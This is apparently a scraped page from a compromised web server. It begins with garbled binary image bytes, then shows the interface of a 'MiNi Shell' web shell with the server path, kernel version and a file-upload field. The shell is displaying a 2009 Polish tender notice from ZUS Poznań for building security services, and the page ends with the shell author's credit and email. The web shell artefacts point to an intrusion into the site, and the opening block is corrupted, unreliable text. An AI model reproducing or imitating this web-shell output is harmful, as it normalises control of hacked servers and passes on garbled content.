JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/181563-N-2009.html

<p class="kh_header"><b>Poznań: Ochrona budynków II Oddziału ZUS Poznań - 2 zadania
Zadanie 1 - usługa ochrony w budynkach:  II O/ZUS  Poznań  w Poznaniu przy ulicy Starołęckiej 31, Inspektoratów:  w Gnieźnie przy ulicy Sienkiewicza 2 , Śremie przy ulicy Szerokiej 2 oraz  w Obornikach  przy ulicy Armii Poznań 27.
Zadanie 2 - usługa ochrony w budynkach Inspektoratów: Konin przy ulicy Św. M. Kolbego 1, Turku przy ulicy Armii Krajowej 18, Kole przy ulicy B. Prusa 11, Słupcy przy ulicy Warszawskiej 1 oraz w budynku Wydziału Poligrafii w Koninie przy ulicy 11 Listopada 22C</b><br>
<b>Numer ogłoszenia: 181563 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych II Oddział w Poznaniu , ul. Starołęcka 31, 61-361 Poznań, woj. wielkopolskie, tel. 061 8745400, faks 061 8772850.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona budynków II Oddziału ZUS Poznań - 2 zadania
Zadanie 1 - usługa ochrony w budynkach:  II O/ZUS  Poznań  w Poznaniu przy ulicy Starołęckiej 31, Inspektoratów:  w Gnieźnie przy ulicy Sienkiewicza 2 , Śremie przy ulicy Szerokiej 2 oraz  w Obornikach  przy ulicy Armii Poznań 27.
Zadanie 2 - usługa ochrony w budynkach Inspektoratów: Konin przy ulicy Św. M. Kolbego 1, Turku przy ulicy Armii Krajowej 18, Kole przy ulicy B. Prusa 11, Słupcy przy ulicy Warszawskiej 1 oraz w budynku Wydziału Poligrafii w Koninie przy ulicy 11 Listopada 22C.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia - Ochrona budynków II Oddziału ZUS Poznań - 2 zadania
Zadanie 1 - usługa ochrony w budynkach:  II O/ZUS  Poznań  w Poznaniu przy ulicy Starołęckiej 31, Inspektoratów:  w Gnieźnie przy ulicy Sienkiewicza 2 , Śremie przy ulicy Szerokiej 2 oraz  w Obornikach  przy ulicy Armii Poznań 27.
Zadanie 2 - usługa ochrony w budynkach Inspektoratów: Konin przy ulicy Św. M.Kolbego 1, Turku przy ulicy Armii Krajowej 18, Kole przy ulicy B. Prusa 11, Słupcy przy ulicy Warszawskiej 1 oraz w budynku Wydziału Poligrafii w Koninie przy ulicy 11 Listopada 22C
2.Wartość zamówienia powyżej 133.000 euro
Zamawiający dopuszcza możliwości składania ofert częściowych na poszczególne zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
zadanie nr 1 - 10. 000,00 zł ( słownie: dziesięć tysięcy złotych 00/100)
zadanie nr 2 -    4.500,00 zł  ( słownie: cztery  tysiące pięćset złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia może ubiegać się Wykonawca spełniający warunki określone  w art. 22 ust. 1 ustawy Prawo zamówień publicznych, sprecyzowane przez Zamawiającego w sposób następujący: 
 1.1 Nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ustawy Prawo zamówień publicznych. 
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści, odpowiednio: 
1) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert, 
2) aktualnego zaświadczenia z właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega  z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał    przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
3) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
4) w przypadku podmiotu zbiorowego dodatkowo aktualnej informacji z Krajowego Rejestru 
Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1.1 ppkt. 1 i ppkt. 2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania 
decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.1.1 ppkt. 3 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.1.1 ppkt. 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1.1 ppkt. 1, ppkt. 2, ppkt. 3 i ppkt.4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym w terminie odpowiednio: dla ppkt. 1 i ppkt. 2 nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, dla ppkt. 3 i ppkt. 4 nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
1.2. Złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia. 
Ocena spełnienia tego warunku odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia. 
(Formularz oświadczenia został określony załącznikiem nr 2 do SIWZ). 
1.3. Posiada uprawnienia do wykonywania działalności gospodarczej. 
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści: 
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2) aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem (wraz ze wszystkimi zmianami). 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1.3 ppkt. 1, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1.3 ppkt. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
1.4. Posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i wykaże wykonanie lub wykonywanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednej usługi dozoru, ochrony obiektów i mienia spełniającej łącznie poniższe warunki: 
1) świadczenie usługi przez nieprzerwany okres minimum 12 miesięcy (licząc do terminu wszczęcia postępowania o udzielenie zamówienia), 
2) świadczenie usługi w sposób ciągły (minimum 5 dni w tygodniu), 
3) powierzchnia użytkowa objęta usługą minimum 1.300 m2, 
4) świadczenie usług w obiektach typu: urzędy, budynki biurowe i socjalne, szkoły, szpitale, urzędy skarbowe, muzea, banki, obiekty handlowe itp. Z wyłączeniem magazynów, hal, wiat, parkingów, itp. 
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści wypełnionego formularza wykazu wykonanych lub wykonywanych usług dozoru, ochrony obiektów i mienia, łącznie       dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. 
1.5. Posiada niezbędną wiedzę i doświadczenie oraz dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia i wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu bezpośredniej ochrony fizycznej, które zdobyły doświadczenie zawodowe i kwalifikacje  ( licencja pracownika ochrony pierwszego stopnia) polegające na wykonywaniu zawodu pracownika ochrony nieprzerwanie przez okres 12 miesięcy w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, w obiektach typu urzędy, budynki biurowe i socjalne, szkoły, szpitale, muzea, banki, obiekty handlowe itp. z wyłączeniem magazynów, wiat, parkingów, itp., odpowiednio: 
1) dla zadania 1-Poznań - zamówienia: 
minimum 10 osobami, 
2) dla zadania 2-Konin -  zamówienia: 
 minimum 8 osobami, 
Dla każdego zadania zamówienia muszą być wykazane inne osoby wykonujące bezpośrednią ochronę fizyczną, o których mowa w pkt 1.5. 
Osoba wykonująca bezpośrednia ochronę fizyczną, o której mowa w pkt. 1.5, nie może być jednocześnie osobą wyznaczoną do organizowania i kierowania zespołami pracowników bezpośredniej ochrony fizycznej, o której mowa
 w pkt. 1.6. 
Ocena spełnienia warunku określonego w pkt. 1.5. odbędzie się na podstawie analizy treści wypełnionego formularza wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, dot. kwalifikacji zawodowych, doświadczenia i wykształcenia (odpowiednio dla każdego zadania zamówienia). 
1.6. Dysponuje osobami zdolnymi do wykonania zamówienia posiadającymi uprawnienia niezbędne do organizowania i kierowania zespołami pracowników bezpośredniej ochrony fizycznej i udokumentuje, że minimum 1 osoba, która będzie wykonywać zamówienie, posiada aktualną licencję pracownika ochrony fizycznej drugiego stopnia. 
Osoba posiadająca uprawnienia niezbędne do organizowania i kierowania zespołami pracowników bezpośredniej ochrony fizycznej, o której mowa w pkt. 1.6. nie może być jednocześnie osobą wykonującą bezpośrednią ochronę fizyczną, o której mowa w pkt. 1.5. 
Ocena spełnienia warunku określonego w pkt. 1.6 odbędzie się na podstawie analizy treści kopii aktualnej licencji pracownika ochrony fizycznej drugiego stopnia, wystawionej przez Komendanta Wojewódzkiego Policji. 
1.7. Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia i udokumentuje, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
Ocena spełnienia tego warunku odbędzie się na podstawie treści aktualnej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 
2.0 Zamawiający informuje, że ocena spełnienia przez Wykonawcę warunków wymaganych odbędzie się w systemie zero-jedynkowym, tzn. /spełnia/ lub /nie spełnia/. 
2.1 Pod rygorem wykluczenia z postępowania o udzielenie zamówienia publicznego Wykonawca składający ofertę musi wykazać, że spełnia wszystkie warunki określone w punktach  od 1.1 do 1.7.  
2.2 Wykonawca zobowiązany jest w ofercie przedstawić niezbędne dokumenty potwierdzające (w sposób nie budzący żadnych wątpliwości) spełnianie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca musi złożyć następujące dokumenty: 

1.1. Wypełniony Formularz Oferty. ( załącznik nr 1 do SIWZ)

1.2. Oryginał lub kopia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

1.3. Oryginał lub kopia aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji (wraz ze wszystkimi zmianami). 

1.4. Oryginał lub kopia aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego, 
potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż
3 miesiące przed upływem terminu składania ofert. 

1.5. Oryginał lub kopia aktualnego zaświadczenia z właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 

1.6. Oryginał lub kopia aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

1.7. W przypadku podmiotu zbiorowego dodatkowo oryginał lub kopia aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

1.8. Wypełniony formularz oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia. ( załącznik nr 2 do SIWZ).

1.9. Wypełniony formularz ( załącznik nr 4 do SIWZ)  wykazu wykonanych lub wykonywanych usług dozoru, ochrony obiektów i mienia, łącznie z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. 

1.10. Wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, dot. kwalifikacji zawodowych, doświadczenia i wykształcenia, odpowiednio dla każdej części zamówienia. 

1.11. Kopia aktualnej licencji pracownika ochrony fizycznej drugiego stopnia, wystawionej przez Komendanta Wojewódzkiego Policji. 

1.12. Oryginał lub kopia aktualnego dokumentu potwierdzającego posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 
100.000,00 zł. 

1.13 . Zamawiający dopuszcza składanie ofert częściowych, określonych w art. 2 pkt. 6 ustawy Prawo zamówień publicznych, które obejmują odpowiednio: 

1) Zadanie 1 - Poznań

2) Zadanie 2 - Konin

Zamawiający dopuszcza złożenie oferty na dowolną ilość części. 

1.14 . Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą być: 

1) Wykonawcy, będący przedsiębiorcami działającymi w formie spółki cywilnej - 
w rozumieniu art. 860-875 ustawy z dnia 23 kwietnia 1964 roku Kodeks cywilny 
(Dz. U. nr 16, poz. nr 93, z 1964 roku, z późniejszymi zamianami), 

2) Wykonawcy występujący wspólnie: 
a) na podstawie umowy konsorcjum, 
b) na podstawie jakiejkolwiek umowy o wspólnym działaniu, którzy składają wspólną ofertę, 
nie są spółką cywilną w rozumieniu przywołanej wyżej ustawy Kodeks cywilny, ani nie 
wiąże ich umowa konsorcjum. 

1.15. Zamawiający informuje, że w przypadku Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia, muszą zostać spełnione warunki, odpowiednio: 
1) warunki określone w art. 22 ust. 1 pkt. 1 i pkt. 4 ustawy Prawo zamówień publicznych muszą zostać
spełnione przez każdego z Wykonawców wspólnie ubiegającego się o udzielenie zamówienia,
2) warunki określone w art. 22 ust. 1 pkt. 2 i pkt. 3 ustawy Prawo zamówień publicznych muszą zostać spełnione łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 

1.16. W przypadku wyboru oferty Wykonawców, którzy wspólnie będą ubiegać się 
o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać osobiście w siedzibie Zamawiającego pokój nr 341 lub przesyłką poleconą na adres wykonawcy po uprzednim zgłoszeniu wniosku o jej wydanie faxem pod nr 0-61 877-28-50. SIWZ bezpłatne..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych II Oddział w Poznaniu,
61-361 Poznań, ul. Starołęcka 31, pok. nr 102 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Pracownikami uprawnionymi do kontaktu z oferentami w godzinach 
 od 7:30 do 14:30 w siedzibie Oddziału są następujące osoby:
- Mariusz Krzemiński, pok. 341 ,tel. (0-prefiks-61) 874-53-00 lub 874   
  54 78 w sprawach formalnych,
- Marek Żurek , pok. 343 , tel. (0-prefiks-61) 874-54-10   w sprawach 
  dotyczących przedmiotu zamówienia.
3.Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania Umowy
w wysokości 3% wartości oferty brutto.
4.SIWZ zostanie udostępniona na stronie internetowej Zamawiającego od dnia publikacji ogłoszenia w Dzienniku Urzędowym Unii  Europejskiej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - usługa ochrony w budynkach:  II O/ZUS  Poznań  w Poznaniu przy ulicy Starołęckiej 31, Inspektoratów:  w Gnieźnie przy ulicy Sienkiewicza 2 , Śremie przy ulicy Szerokiej 2 oraz  w Obornikach  przy ulicy Armii Poznań 27.
2.Wartość zamówienia powyżej 133.000 euro.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochrona budynków II Oddziału ZUS Poznań - 2 zadania
Zadanie 1 - usługa ochrony w budynkach:  II O/ZUS  Poznań  w Poznaniu przy ulicy Starołęckiej 31, Inspektoratów:  w Gnieźnie przy ulicy Sienkiewicza 2 , Śremie przy ulicy Szerokiej 2 oraz  w Obornikach  przy ulicy Armii Poznań 27.
Wartość zamówienia powyżej 133.000 euro.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com